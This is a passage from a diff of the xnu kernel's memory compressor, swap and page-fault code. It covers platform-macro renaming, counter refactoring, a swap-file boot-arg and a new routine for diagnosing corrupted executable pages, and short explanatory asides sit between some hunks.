                assert(new_state == C_IS_FILLING || new_state == C_IS_FREE);
@@ -2195,6 +2195,13 @@ compressor_needs_to_swap(void)
                        goto check_if_low_space;
                }
        }
+
+#if (XNU_TARGET_OS_OSX && __arm64__)
+       /*
+        * Thrashing detection disabled.
+        */
+#else /* (XNU_TARGET_OS_OSX && __arm64__) */
+
        compute_swapout_target_age();
 
        if (swapout_target_age) {
@@ -2219,6 +2226,7 @@ compressor_needs_to_swap(void)
        if (swapout_target_age) {
                should_swap = TRUE;
        }
+#endif /* (XNU_TARGET_OS_OSX && __arm64__) */
 
 check_if_low_space:
 
@@ -2504,9 +2512,9 @@ vm_compressor_do_delayed_compactions(boolean_t flush_all)
 
        VM_DEBUG_CONSTANT_EVENT(vm_compressor_do_delayed_compactions, VM_COMPRESSOR_DO_DELAYED_COMPACTIONS, DBG_FUNC_START, c_minor_count, flush_all, 0, 0);
 
-#if !CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
        LCK_MTX_ASSERT(c_list_lock, LCK_MTX_ASSERT_OWNED);
-#endif /* !CONFIG_EMBEDDED */
+#endif /* XNU_TARGET_OS_OSX */
 
        while (!queue_empty(&c_minor_list_head) && needs_to_swap == FALSE) {
                c_seg = (c_segment_t)queue_first(&c_minor_list_head);
@@ -3286,11 +3294,11 @@ c_seg_allocate(c_segment_t *current_chead)
        int             min_needed;
        int             size_to_populate;
 
-#if !CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
        if (vm_compressor_low_on_space()) {
                vm_compressor_take_paging_space_action();
        }
-#endif /* !CONFIG_EMBEDDED */
+#endif /* XNU_TARGET_OS_OSX */
 
        if ((c_seg = *current_chead) == NULL) {
                uint32_t        c_segno;
@@ -4465,11 +4473,11 @@ done:
                vm_swap_consider_defragmenting(VM_SWAP_FLAGS_NONE);
        }
 
-#if CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
        if ((c_minor_count && COMPRESSOR_NEEDS_TO_MINOR_COMPACT()) || vm_compressor_needs_to_major_compact()) {
                vm_wake_compactor_swapper();
        }
-#endif
+#endif /* !XNU_TARGET_OS_OSX */
 
        return retval;
 }
index 9b4cf69ebe350ed06360be4ab70d34941a93960c..f7191c4571d446914ee04e361495cfa64f03ffff 100644 (file)
@@ -468,13 +468,13 @@ extern void kdp_compressor_busy_find_owner(event64_t wait_event, thread_waitinfo
 #define VM_PAGE_COMPRESSOR_SWAP_CATCHUP_THRESHOLD       (((AVAILABLE_MEMORY) * 10) / (vm_compressor_catchup_threshold_divisor ? vm_compressor_catchup_threshold_divisor : 10))
 #define VM_PAGE_COMPRESSOR_HARD_THROTTLE_THRESHOLD      (((AVAILABLE_MEMORY) * 9) / (vm_compressor_catchup_threshold_divisor ? vm_compressor_catchup_threshold_divisor : 9))
 
-#ifdef  CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
 #define AVAILABLE_NON_COMPRESSED_MIN                    20000
 #define COMPRESSOR_NEEDS_TO_SWAP()              (((AVAILABLE_NON_COMPRESSED_MEMORY < VM_PAGE_COMPRESSOR_SWAP_THRESHOLD) || \
                                                  (AVAILABLE_NON_COMPRESSED_MEMORY < AVAILABLE_NON_COMPRESSED_MIN)) ? 1 : 0)
-#else
+#else /* !XNU_TARGET_OS_OSX */
 #define COMPRESSOR_NEEDS_TO_SWAP()              ((AVAILABLE_NON_COMPRESSED_MEMORY < VM_PAGE_COMPRESSOR_SWAP_THRESHOLD) ? 1 : 0)
-#endif
+#endif /* !XNU_TARGET_OS_OSX */
 
 #define HARD_THROTTLE_LIMIT_REACHED()           ((AVAILABLE_NON_COMPRESSED_MEMORY < VM_PAGE_COMPRESSOR_HARD_THROTTLE_THRESHOLD) ? 1 : 0)
 #define SWAPPER_NEEDS_TO_UNTHROTTLE()           ((AVAILABLE_NON_COMPRESSED_MEMORY < VM_PAGE_COMPRESSOR_SWAP_UNTHROTTLE_THRESHOLD) ? 1 : 0)
@@ -484,11 +484,11 @@ extern void kdp_compressor_busy_find_owner(event64_t wait_event, thread_waitinfo
 #define COMPRESSOR_NEEDS_TO_MINOR_COMPACT()     ((AVAILABLE_NON_COMPRESSED_MEMORY < VM_PAGE_COMPRESSOR_COMPACT_THRESHOLD) ? 1 : 0)
 
 
-#ifdef  CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
 #define COMPRESSOR_FREE_RESERVED_LIMIT          28
-#else
+#else /* !XNU_TARGET_OS_OSX */
 #define COMPRESSOR_FREE_RESERVED_LIMIT          128
-#endif
+#endif /* !XNU_TARGET_OS_OSX */
 
 uint32_t vm_compressor_get_encode_scratch_size(void) __pure2;
 uint32_t vm_compressor_get_decode_scratch_size(void) __pure2;
index 0c98c24a458327475b59eaa5e1ed37b810e3a3b6..01a41f9debc036996e0d23e0c72f05fbb6532d74 100644 (file)
@@ -127,7 +127,7 @@ extern int vnode_getwithref(struct vnode* vp);
 
 boolean_t vm_swap_force_defrag = FALSE, vm_swap_force_reclaim = FALSE;
 
-#if CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
 
 /*
  * For CONFIG_FREEZE, we scale the c_segments_limit based on the
@@ -145,7 +145,7 @@ boolean_t vm_swap_force_defrag = FALSE, vm_swap_force_reclaim = FALSE;
                                         ((cur_ts - vm_swapfile_last_failed_to_create_ts) > VM_SWAPFILE_DELAYED_CREATE) ? 1 : 0)
 #define VM_SWAP_SHOULD_TRIM(swf)        ((swf->swp_delayed_trim_count >= VM_SWAPFILE_DELAYED_TRIM_MAX) ? 1 : 0)
 
-#else /* CONFIG_EMBEDDED */
+#else /* !XNU_TARGET_OS_OSX */
 
 #define VM_MAX_SWAP_FILE_NUM            100
 #define VM_SWAPFILE_DELAYED_TRIM_MAX    128
@@ -156,7 +156,7 @@ boolean_t vm_swap_force_defrag = FALSE, vm_swap_force_reclaim = FALSE;
                                         ((cur_ts - vm_swapfile_last_failed_to_create_ts) > VM_SWAPFILE_DELAYED_CREATE) ? 1 : 0)
 #define VM_SWAP_SHOULD_TRIM(swf)        ((swf->swp_delayed_trim_count >= VM_SWAPFILE_DELAYED_TRIM_MAX) ? 1 : 0)
 
-#endif /* CONFIG_EMBEDDED */
+#endif /* !XNU_TARGET_OS_OSX */
 
 #define VM_SWAP_SHOULD_RECLAIM()        (((vm_swap_force_reclaim == TRUE) || ((vm_swapfile_total_segs_alloced - vm_swapfile_total_segs_used) >= SWAPFILE_RECLAIM_THRESHOLD_SEGS)) ? 1 : 0)
 #define VM_SWAP_SHOULD_ABORT_RECLAIM()  (((vm_swap_force_reclaim == FALSE) && ((vm_swapfile_total_segs_alloced - vm_swapfile_total_segs_used) <= SWAPFILE_RECLAIM_MINIMUM_SEGS)) ? 1 : 0)
@@ -446,7 +446,7 @@ vm_compressor_swap_init()
        proc_set_thread_policy_with_tid(kernel_task, thread->thread_id,
            TASK_POLICY_INTERNAL, TASK_POLICY_PASSIVE_IO, TASK_POLICY_ENABLE);
 
-#if CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
        /*
         * dummy value until the swap file gets created
         * when we drive the first c_segment_t to the
@@ -454,9 +454,20 @@ vm_compressor_swap_init()
         * know the true size we have to work with
         */
        c_overage_swapped_limit = 16;
-#endif
+#endif /* !XNU_TARGET_OS_OSX */
 
        vm_num_swap_files_config = VM_MAX_SWAP_FILE_NUM;
+#if DEVELOPMENT || DEBUG
+       typeof(vm_num_swap_files_config) parsed_vm_max_num_swap_files = 0;
+       if (PE_parse_boot_argn("vm_max_num_swap_files", &parsed_vm_max_num_swap_files, sizeof(parsed_vm_max_num_swap_files))) {
+               if (parsed_vm_max_num_swap_files > 0) {
+                       vm_num_swap_files_config = parsed_vm_max_num_swap_files;
+               } else {
+                       printf("WARNING: Ignoring vm_max_num_swap_files=%d boot-arg. Value must be > 0\n", parsed_vm_max_num_swap_files);
+               }
+       }
+#endif
+       printf("Maximum number of VM swap files: %d\n", vm_num_swap_files_config);
 
        printf("VM Swap Subsystem is ON\n");
 }
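
On DEVELOPMENT and DEBUG kernels the hunk above lets a vm_max_num_swap_files boot-arg override
VM_MAX_SWAP_FILE_NUM, ignoring values that are not strictly positive and logging the resulting
limit either way. As a hedged usage note, such a boot-arg would normally be set with something like
sudo nvram boot-args="vm_max_num_swap_files=8" and takes effect on the next boot; release kernels
compile the parsing out and keep the default limit.
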
@@ -534,14 +545,14 @@ vm_compaction_swapper_do_init(void)
                                        vm_compressor_catchup_threshold_divisor = 30;
                                }
                        }
-#if !CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
                        vnode_setswapmount(vp);
                        vm_swappin_avail = vnode_getswappin_avail(vp);
 
                        if (vm_swappin_avail) {
                                vm_swappin_enabled = TRUE;
                        }
-#endif
+#endif /* XNU_TARGET_OS_OSX */
                        vm_swapfile_close((uint64_t)pathname, vp);
                }
                kheap_free(KHEAP_TEMP, pathname, namelen);
@@ -1261,7 +1272,7 @@ vm_swapout_finish(c_segment_t c_seg, uint64_t f_offset, uint32_t size, kern_retu
 
                c_seg->c_store.c_swap_handle = f_offset;
 
-               VM_STAT_INCR_BY(swapouts, size >> PAGE_SHIFT);
+               counter_add(&vm_statistics_swapouts, size >> PAGE_SHIFT);
 
                if (c_seg->c_bytes_used) {
                        OSAddAtomic64(-c_seg->c_bytes_used, &compressor_bytes_used);
@@ -1421,7 +1432,7 @@ vm_swap_create_file()
                        lck_mtx_unlock(&vm_swap_data_lock);
 
                        thread_wakeup((event_t) &vm_num_swap_files);
-#if CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
                        if (vm_num_swap_files == 1) {
                                c_overage_swapped_limit = (uint32_t)size / C_SEG_BUFSIZE;
 
@@ -1429,7 +1440,7 @@ vm_swap_create_file()
                                        c_overage_swapped_limit /= 2;
                                }
                        }
-#endif
+#endif /* !XNU_TARGET_OS_OSX */
                        break;
                } else {
                        size = size / 2;
@@ -1487,7 +1498,7 @@ vm_swap_get(c_segment_t c_seg, uint64_t f_offset, uint64_t size)
        C_SEG_WRITE_PROTECT(c_seg);
 #endif
        if (retval == 0) {
-               VM_STAT_INCR_BY(swapins, size >> PAGE_SHIFT);
+               counter_add(&vm_statistics_swapins, size >> PAGE_SHIFT);
        } else {
                vm_swap_get_failures++;
        }
@@ -2078,7 +2089,7 @@ ReTry_for_cseg:
                        vnode_put(swf->swp_vp);
                }
 
-               VM_STAT_INCR_BY(swapins, c_size >> PAGE_SHIFT);
+               counter_add(&vm_statistics_swapins, c_size >> PAGE_SHIFT);
 
                if (vm_swap_put(addr, &f_offset, c_size, c_seg, NULL)) {
                        vm_offset_t     c_buffer;
@@ -2105,7 +2116,7 @@ ReTry_for_cseg:
 
                        goto swap_io_failed;
                }
-               VM_STAT_INCR_BY(swapouts, c_size >> PAGE_SHIFT);
+               counter_add(&vm_statistics_swapouts, c_size >> PAGE_SHIFT);
 
                lck_mtx_lock_spin_always(&c_seg->c_lock);
 
index c8a03a235f33485d0d5e334dad45ff1adb949d5a..da6f6e33c05ba3e44e0db5a9f8bb9457bd69e9c6 100644 (file)
 #include <libkern/crypto/aes.h>
 #include <kern/host_statistics.h>
 
-#if CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
 
 #define MIN_SWAP_FILE_SIZE              (64 * 1024 * 1024ULL)
 
 #define MAX_SWAP_FILE_SIZE              (128 * 1024 * 1024ULL)
 
-#else /* CONFIG_EMBEDDED */
+#else /* !XNU_TARGET_OS_OSX */
 
 #define MIN_SWAP_FILE_SIZE              (256 * 1024 * 1024ULL)
 
 #define MAX_SWAP_FILE_SIZE              (1 * 1024 * 1024 * 1024ULL)
 
-#endif /* CONFIG_EMBEDDED */
+#endif /* !XNU_TARGET_OS_OSX */
 
 #define COMPRESSED_SWAP_CHUNK_SIZE      (C_SEG_BUFSIZE)
 
index 2b7dfe4bbc6e98e838c904cac0c1af3a8c9e503b..637798bfd03ba5320c0552e367421b5ff1e97f2a 100644 (file)
@@ -157,7 +157,11 @@ typedef struct compressor_pager {
 
        /* pager-specific data */
        lck_mtx_t                       cpgr_lock;
-       unsigned int                    cpgr_references;
+#if MEMORY_OBJECT_HAS_REFCOUNT
+#define cpgr_references                 cpgr_hdr.mo_ref
+#else
+       os_ref_atomic_t                 cpgr_references;
+#endif
        unsigned int                    cpgr_num_slots;
        unsigned int                    cpgr_num_slots_occupied;
        union {
@@ -340,8 +344,7 @@ compressor_memory_object_reference(
        }
 
        compressor_pager_lock(pager);
-       assert(pager->cpgr_references > 0);
-       pager->cpgr_references++;
+       os_ref_retain_locked_raw(&pager->cpgr_references, NULL);
        compressor_pager_unlock(pager);
 }
 
@@ -365,7 +368,7 @@ compressor_memory_object_deallocate(
        }
 
        compressor_pager_lock(pager);
-       if (--pager->cpgr_references > 0) {
+       if (os_ref_release_locked_raw(&pager->cpgr_references, NULL) > 0) {
                compressor_pager_unlock(pager);
                return;
        }
@@ -579,7 +582,7 @@ compressor_memory_object_create(
        }
 
        compressor_pager_lock_init(pager);
-       pager->cpgr_references = 1;
+       os_ref_init_raw(&pager->cpgr_references, NULL);
        pager->cpgr_num_slots = (uint32_t)(new_size / PAGE_SIZE);
        pager->cpgr_num_slots_occupied = 0;
 
@@ -727,7 +730,7 @@ vm_compressor_pager_init(void)
            sizeof(struct compressor_pager), ZC_NOENCRYPT,
            ZONE_ID_ANY, ^(zone_t z){
 #if defined(__LP64__)
-               zone_set_submap_idx(z, Z_SUBMAP_IDX_VA_RESTRICTED_MAP);
+               zone_set_submap_idx(z, Z_SUBMAP_IDX_VA_RESTRICTED);
 #else
                (void)z;
 #endif /* defined(__LP64__) */
@@ -739,7 +742,7 @@ vm_compressor_pager_init(void)
                        compressor_slots_zones_names[idx],
                        compressor_slots_zones_sizes[idx], ZC_NONE,
                        ZONE_ID_ANY, ^(zone_t z){
-                       zone_set_submap_idx(z, Z_SUBMAP_IDX_VA_RESTRICTED_MAP);
+                       zone_set_submap_idx(z, Z_SUBMAP_IDX_VA_RESTRICTED);
                });
        }
 #endif /* defined(__LP64__) */
index 43814d16ee0d6dcfe424ddd333feb86ce0169aa8..207a514130093d07e76db59e55706a7db8ef41d6 100644 (file)
@@ -77,7 +77,7 @@
 
 #include <kern/kern_types.h>
 #include <kern/host_statistics.h>
-#include <kern/counters.h>
+#include <kern/counter.h>
 #include <kern/task.h>
 #include <kern/thread.h>
 #include <kern/sched_prim.h>
@@ -137,6 +137,9 @@ extern struct vnode *vnode_pager_lookup_vnode(memory_object_t);
 
 uint64_t vm_hard_throttle_threshold;
 
+#if DEBUG || DEVELOPMENT
+static bool vmtc_panic_instead = false;
+#endif /* DEBUG || DEVELOPMENT */
 
 OS_ALWAYS_INLINE
 boolean_t
@@ -157,7 +160,7 @@ NEED_TO_HARD_THROTTLE_THIS_TASK(void)
 
 #define VM_STAT_DECOMPRESSIONS()        \
 MACRO_BEGIN                             \
-       VM_STAT_INCR(decompressions);       \
+       counter_inc(&vm_statistics_decompressions); \
        current_thread()->decompressions++; \
 MACRO_END
 
@@ -280,6 +283,10 @@ vm_fault_init(void)
        PE_parse_boot_argn("vm_protect_privileged_from_untrusted",
            &vm_protect_privileged_from_untrusted,
            sizeof(vm_protect_privileged_from_untrusted));
+
+#if DEBUG || DEVELOPMENT
+       (void)PE_parse_boot_argn("text_corruption_panic", &vmtc_panic_instead, sizeof(vmtc_panic_instead));
+#endif /* DEBUG || DEVELOPMENT */
 }
 
 __startup_func
@@ -831,7 +838,7 @@ vm_fault_zero_page(vm_page_t m, boolean_t no_zero_fill)
        } else {
                vm_page_zero_fill(m);
 
-               VM_STAT_INCR(zero_fill_count);
+               counter_inc(&vm_statistics_zero_fill_count);
                DTRACE_VM2(zfod, int, 1, (uint64_t *), NULL);
        }
        assert(!m->vmp_laundry);
@@ -1113,8 +1120,6 @@ vm_fault_page(
 #endif
                                wait_result = PAGE_SLEEP(object, m, interruptible);
 
-                               counter(c_vm_fault_page_block_busy_kernel++);
-
                                if (wait_result != THREAD_AWAKENED) {
                                        vm_fault_cleanup(object, first_m);
                                        thread_interrupt_level(interruptible_state);
@@ -1334,7 +1339,6 @@ vm_fault_page(
 
                                vm_fault_cleanup(object, first_m);
 
-                               counter(c_vm_fault_page_block_backoff_kernel++);
                                vm_object_lock(object);
                                assert(object->ref_count > 0);
 
@@ -1493,7 +1497,6 @@ vm_fault_page(
                                 */
                                vm_object_reference_locked(object);
                                vm_fault_cleanup(object, first_m);
-                               counter(c_vm_fault_page_block_backoff_kernel++);
 
                                vm_object_lock(object);
                                assert(object->ref_count > 0);
@@ -1535,8 +1538,6 @@ vm_fault_page(
 
                                vm_fault_cleanup(object, first_m);
 
-                               counter(c_vm_fault_page_block_backoff_kernel++);
-
                                vm_object_lock(object);
                                assert(object->ref_count > 0);
 
@@ -2075,7 +2076,7 @@ dont_look_for_page:
                        vm_object_unlock(object);
 
                        my_fault = DBG_COW_FAULT;
-                       VM_STAT_INCR(cow_faults);
+                       counter_inc(&vm_statistics_cow_faults);
                        DTRACE_VM2(cow_fault, int, 1, (uint64_t *), NULL);
                        current_task()->cow_faults++;
 
@@ -2194,11 +2195,9 @@ dont_look_for_page:
                                vm_object_reference_locked(copy_object);
                                vm_object_unlock(copy_object);
                                vm_fault_cleanup(object, first_m);
-                               counter(c_vm_fault_page_block_backoff_kernel++);
 
                                vm_object_lock(copy_object);
                                assert(copy_object->ref_count > 0);
-                               VM_OBJ_RES_DECR(copy_object);
                                vm_object_lock_assert_exclusive(copy_object);
                                copy_object->ref_count--;
                                assert(copy_object->ref_count > 0);
@@ -2237,7 +2236,6 @@ dont_look_for_page:
                        if (copy_m == VM_PAGE_NULL) {
                                RELEASE_PAGE(m);
 
-                               VM_OBJ_RES_DECR(copy_object);
                                vm_object_lock_assert_exclusive(copy_object);
                                copy_object->ref_count--;
                                assert(copy_object->ref_count > 0);
@@ -2353,7 +2351,6 @@ dont_look_for_page:
                copy_object->ref_count--;
                assert(copy_object->ref_count > 0);
 
-               VM_OBJ_RES_DECR(copy_object);
                vm_object_unlock(copy_object);
 
                break;
@@ -4004,8 +4001,8 @@ vm_fault_internal(
 
        fault_type = (change_wiring ? VM_PROT_NONE : caller_prot);
 
-       VM_STAT_INCR(faults);
-       current_task()->faults++;
+       counter_inc(&vm_statistics_faults);
+       counter_inc(&current_task()->faults);
        original_fault_type = fault_type;
 
        need_copy = FALSE;
@@ -4323,8 +4320,6 @@ RetryFault:
 
                                if (result == THREAD_WAITING) {
                                        result = thread_block(THREAD_CONTINUE_NULL);
-
-                                       counter(c_vm_fault_page_block_busy_kernel++);
                                }
                                if (result == THREAD_AWAKENED || result == THREAD_RESTART) {
                                        goto RetryFault;
@@ -4793,7 +4788,7 @@ FastPmapEnter:
                        vm_fault_collapse_total++;
 
                        type_of_fault = DBG_COW_FAULT;
-                       VM_STAT_INCR(cow_faults);
+                       counter_inc(&vm_statistics_cow_faults);
                        DTRACE_VM2(cow_fault, int, 1, (uint64_t *), NULL);
                        current_task()->cow_faults++;
 
@@ -5187,7 +5182,7 @@ FastPmapEnter:
                                                 *   lock across the zero fill.
                                                 */
                                                vm_page_zero_fill(m);
-                                               VM_STAT_INCR(zero_fill_count);
+                                               counter_inc(&vm_statistics_zero_fill_count);
                                                DTRACE_VM2(zfod, int, 1, (uint64_t *), NULL);
                                        }
                                        if (page_needs_data_sync) {
@@ -6302,10 +6297,10 @@ vm_fault_wire_fast(
        vm_map_offset_t         fault_phys_offset;
        struct vm_object_fault_info fault_info = {};
 
-       VM_STAT_INCR(faults);
+       counter_inc(&vm_statistics_faults);
 
        if (thread != THREAD_NULL && thread->task != TASK_NULL) {
-               thread->task->faults++;
+               counter_inc(&thread->task->faults);
        }
 
 /*
@@ -7229,13 +7224,11 @@ vm_page_validate_cs_mapped(
        }
 }
 
-void
-vm_page_validate_cs(
-       vm_page_t       page,
-       vm_map_size_t   fault_page_size,
-       vm_map_offset_t fault_phys_offset)
+static void
+vm_page_map_and_validate_cs(
+       vm_object_t     object,
+       vm_page_t       page)
 {
-       vm_object_t             object;
        vm_object_offset_t      offset;
        vm_map_offset_t         koffset;
        vm_map_size_t           ksize;
@@ -7244,12 +7237,6 @@ vm_page_validate_cs(
        boolean_t               busy_page;
        boolean_t               need_unmap;
 
-       object = VM_PAGE_OBJECT(page);
-       vm_object_lock_assert_held(object);
-
-       if (vm_page_validate_cs_fast(page, fault_page_size, fault_phys_offset)) {
-               return;
-       }
        vm_object_lock_assert_exclusive(object);
 
        assert(object->code_signed);
@@ -7305,6 +7292,23 @@ vm_page_validate_cs(
        vm_object_paging_end(object);
 }
 
+void
+vm_page_validate_cs(
+       vm_page_t       page,
+       vm_map_size_t   fault_page_size,
+       vm_map_offset_t fault_phys_offset)
+{
+       vm_object_t             object;
+
+       object = VM_PAGE_OBJECT(page);
+       vm_object_lock_assert_held(object);
+
+       if (vm_page_validate_cs_fast(page, fault_page_size, fault_phys_offset)) {
+               return;
+       }
+       vm_page_map_and_validate_cs(object, page);
+}
+
 void
 vm_page_validate_cs_mapped_chunk(
        vm_page_t       page,
@@ -7477,3 +7481,550 @@ vmrtf_extract(uint64_t cupid, __unused boolean_t isroot, unsigned long vrecordsz
        *vmrtfrv = numextracted;
        return early_exit;
 }
+
+/*
+ * Only allow one diagnosis to be in flight at a time, to avoid
+ * creating too much additional memory usage.
+ */
+static volatile uint_t vmtc_diagnosing;
+unsigned int vmtc_total;
+unsigned int vmtc_undiagnosed;
+unsigned int vmtc_not_eligible;
+unsigned int vmtc_copyin_fail;
+unsigned int vmtc_not_found;
+unsigned int vmtc_one_bit_flip;
+unsigned int vmtc_byte_counts[MAX_TRACK_POWER2 + 1];
+
+#if DEVELOPMENT || DEBUG
+/*
+ * Keep around the last diagnosed corruption buffers to aid in debugging.
+ */
+static size_t vmtc_last_buffer_size;
+static uint64_t *vmtc_last_before_buffer = NULL;
+static uint64_t *vmtc_last_after_buffer = NULL;
+#endif /* DEVELOPMENT || DEBUG */
+
+/*
+ * Set things up so we can diagnose a potential text page corruption.
+ */
+static uint64_t *
+vmtc_text_page_diagnose_setup(
+       vm_map_offset_t code_addr)
+{
+       uint64_t        *buffer;
+       size_t          size = MIN(vm_map_page_size(current_map()), PAGE_SIZE);
+
+       (void)OSAddAtomic(1, &vmtc_total);
+
+       /*
+        * If another is being diagnosed, skip this one.
+        */
+       if (!OSCompareAndSwap(0, 1, &vmtc_diagnosing)) {
+               (void)OSAddAtomic(1, &vmtc_undiagnosed);
+               return NULL;
+       }
+
+       /*
+        * Get the contents of the corrupt page.
+        */
+       buffer = kheap_alloc(KHEAP_DEFAULT, size, Z_WAITOK);
+       if (copyin((user_addr_t)vm_map_trunc_page(code_addr, size - 1), buffer, size) != 0) {
+               /* copyin error, so undo things */
+               kheap_free(KHEAP_DEFAULT, buffer, size);
+               (void)OSAddAtomic(1, &vmtc_undiagnosed);
+               ++vmtc_copyin_fail;
+               if (!OSCompareAndSwap(1, 0, &vmtc_diagnosing)) {
+                       panic("Bad compare and swap in setup!");
+               }
+               return NULL;
+       }
+       return buffer;
+}
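For reference, a minimal user-space analogue of the compare-and-swap gate above (only one diagnosis in flight at a time), sketched with C11 atomics; the names here are illustrative and not part of xnu:

/*
 * Illustrative analogue (not xnu code) of the single-flight gate used by
 * vmtc_text_page_diagnose_setup(): only one caller may claim the
 * "diagnosing" slot; everyone else bails out immediately.
 */
#include <stdatomic.h>
#include <stdbool.h>
#include <stdio.h>

static atomic_uint diagnosing;   /* 0 = idle, 1 = a diagnosis is in flight */

static bool
diagnose_try_begin(void)
{
        unsigned expected = 0;
        /* equivalent in spirit to OSCompareAndSwap(0, 1, &vmtc_diagnosing) */
        return atomic_compare_exchange_strong(&diagnosing, &expected, 1);
}

static void
diagnose_end(void)
{
        unsigned expected = 1;
        if (!atomic_compare_exchange_strong(&diagnosing, &expected, 0)) {
                /* mirrors the panic("Bad compare and swap ...") in the kernel code */
                fprintf(stderr, "gate was not held\n");
        }
}

int
main(void)
{
        if (diagnose_try_begin()) {
                /* ... save the page contents, run the comparison ... */
                diagnose_end();
        }
        return 0;
}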
+
+/*
+ * Diagnose the text page by comparing its contents with
+ * the one we've previously saved.
+ */
+static void
+vmtc_text_page_diagnose(
+       vm_map_offset_t code_addr,
+       uint64_t        *old_code_buffer)
+{
+       uint64_t        *new_code_buffer;
+       size_t          size = MIN(vm_map_page_size(current_map()), PAGE_SIZE);
+       uint_t          count = (uint_t)size / sizeof(uint64_t);
+       uint_t          diff_count = 0;
+       bool            bit_flip = false;
+       uint_t          b;
+       uint64_t        *new;
+       uint64_t        *old;
+
+       new_code_buffer = kheap_alloc(KHEAP_DEFAULT, size, Z_WAITOK);
+       if (copyin((user_addr_t)vm_map_trunc_page(code_addr, size - 1), new_code_buffer, size) != 0) {
+               /* copyin error, so undo things */
+               (void)OSAddAtomic(1, &vmtc_undiagnosed);
+               ++vmtc_copyin_fail;
+               goto done;
+       }
+
+       new = new_code_buffer;
+       old = old_code_buffer;
+       for (; count-- > 0; ++new, ++old) {
+               if (*new == *old) {
+                       continue;
+               }
+
+               /*
+                * On first diff, check for a single bit flip
+                */
+               if (diff_count == 0) {
+                       uint64_t x = (*new ^ *old);
+                       assert(x != 0);
+                       if ((x & (x - 1)) == 0) {
+                               bit_flip = true;
+                               ++diff_count;
+                               continue;
+                       }
+               }
+
+               /*
+                * count up the number of different bytes.
+                */
+               for (b = 0; b < sizeof(uint64_t); ++b) {
+                       char *n = (char *)new;
+                       char *o = (char *)old;
+                       if (n[b] != o[b]) {
+                               ++diff_count;
+                       }
+               }
+
+               /* quit counting when too many */
+               if (diff_count > (1 << MAX_TRACK_POWER2)) {
+                       break;
+               }
+       }
+
+       if (diff_count > 1) {
+               bit_flip = false;
+       }
+
+       if (diff_count == 0) {
+               ++vmtc_not_found;
+       } else if (bit_flip) {
+               ++vmtc_one_bit_flip;
+               ++vmtc_byte_counts[0];
+       } else {
+               for (b = 0; b <= MAX_TRACK_POWER2; ++b) {
+                       if (diff_count <= (1 << b)) {
+                               ++vmtc_byte_counts[b];
+                               break;
+                       }
+               }
+               if (diff_count > (1 << MAX_TRACK_POWER2)) {
+                       ++vmtc_byte_counts[MAX_TRACK_POWER2];
+               }
+       }
+
+done:
+       /*
+        * Free up the code copy buffers, but save the last
+        * set on development / debug kernels in case they
+        * can provide evidence for debugging memory stomps.
+        */
+#if DEVELOPMENT || DEBUG
+       if (vmtc_last_before_buffer != NULL) {
+               kheap_free(KHEAP_DEFAULT, vmtc_last_before_buffer, vmtc_last_buffer_size);
+       }
+       if (vmtc_last_after_buffer != NULL) {
+               kheap_free(KHEAP_DEFAULT, vmtc_last_after_buffer, vmtc_last_buffer_size);
+       }
+       vmtc_last_before_buffer = old_code_buffer;
+       vmtc_last_after_buffer = new_code_buffer;
+       vmtc_last_buffer_size = size;
+#else /* DEVELOPMENT || DEBUG */
+       kheap_free(KHEAP_DEFAULT, new_code_buffer, size);
+       kheap_free(KHEAP_DEFAULT, old_code_buffer, size);
+#endif /* DEVELOPMENT || DEBUG */
+
+       /*
+        * We're finished, so clear the diagnosing flag.
+        */
+       if (!OSCompareAndSwap(1, 0, &vmtc_diagnosing)) {
+               panic("Bad compare and swap in diagnose!");
+       }
+}
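The single-bit-flip test above is the standard power-of-two check applied to the XOR of the old and new words. A self-contained sketch (function and test names are illustrative, not from xnu):

/*
 * Standalone illustration of the (x & (x - 1)) == 0 test used above:
 * XOR the saved and refetched words; if exactly one bit differs, the
 * XOR result is a power of two.
 */
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

static bool
is_single_bit_flip(uint64_t old_word, uint64_t new_word)
{
        uint64_t x = old_word ^ new_word;
        return x != 0 && (x & (x - 1)) == 0;
}

int
main(void)
{
        assert(is_single_bit_flip(0x10, 0x30));   /* one bit flipped      */
        assert(!is_single_bit_flip(0x10, 0x10));  /* identical words      */
        assert(!is_single_bit_flip(0x10, 0x33));  /* several bits differ  */
        return 0;
}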
+
+/*
+ * For the given map, virt address, find the object, offset, and page.
+ * This has to lookup the map entry, verify protections, walk any shadow chains.
+ * If found, returns with the object locked.
+ */
+static kern_return_t
+vmtc_revalidate_lookup(
+       vm_map_t               map,
+       vm_map_offset_t        vaddr,
+       vm_object_t            *ret_object,
+       vm_object_offset_t     *ret_offset,
+       vm_page_t              *ret_page)
+{
+       vm_object_t            object;
+       vm_object_offset_t     offset;
+       vm_page_t              page;
+       kern_return_t          kr = KERN_SUCCESS;
+       uint8_t                object_lock_type = OBJECT_LOCK_EXCLUSIVE;
+       vm_map_version_t       version;
+       boolean_t              wired;
+       struct vm_object_fault_info fault_info = {};
+       vm_map_t               real_map = NULL;
+       vm_prot_t              prot;
+       vm_object_t            shadow;
+
+       /*
+        * Find the object/offset for the given location/map.
+        * Note this returns with the object locked.
+        */
+restart:
+       vm_map_lock_read(map);
+       object = VM_OBJECT_NULL;        /* in case we come around the restart path */
+       kr = vm_map_lookup_locked(&map, vaddr, VM_PROT_READ,
+           object_lock_type, &version, &object, &offset, &prot, &wired,
+           &fault_info, &real_map, NULL);
+       vm_map_unlock_read(map);
+       if (real_map != NULL && real_map != map) {
+               vm_map_unlock(real_map);
+       }
+
+       /*
+        * If there's no mapping here, or if we fail because the page
+        * wasn't mapped executable, we can ignore this.
+        */
+       if (kr != KERN_SUCCESS ||
+           object == NULL ||
+           !(prot & VM_PROT_EXECUTE)) {
+               kr = KERN_FAILURE;
+               goto done;
+       }
+
+       /*
+        * Chase down any shadow chains to find the actual page.
+        */
+       for (;;) {
+               /*
+                * See if the page is on the current object.
+                */
+               page = vm_page_lookup(object, vm_object_trunc_page(offset));
+               if (page != NULL) {
+                       /* restart the lookup */
+                       if (page->vmp_restart) {
+                               vm_object_unlock(object);
+                               goto restart;
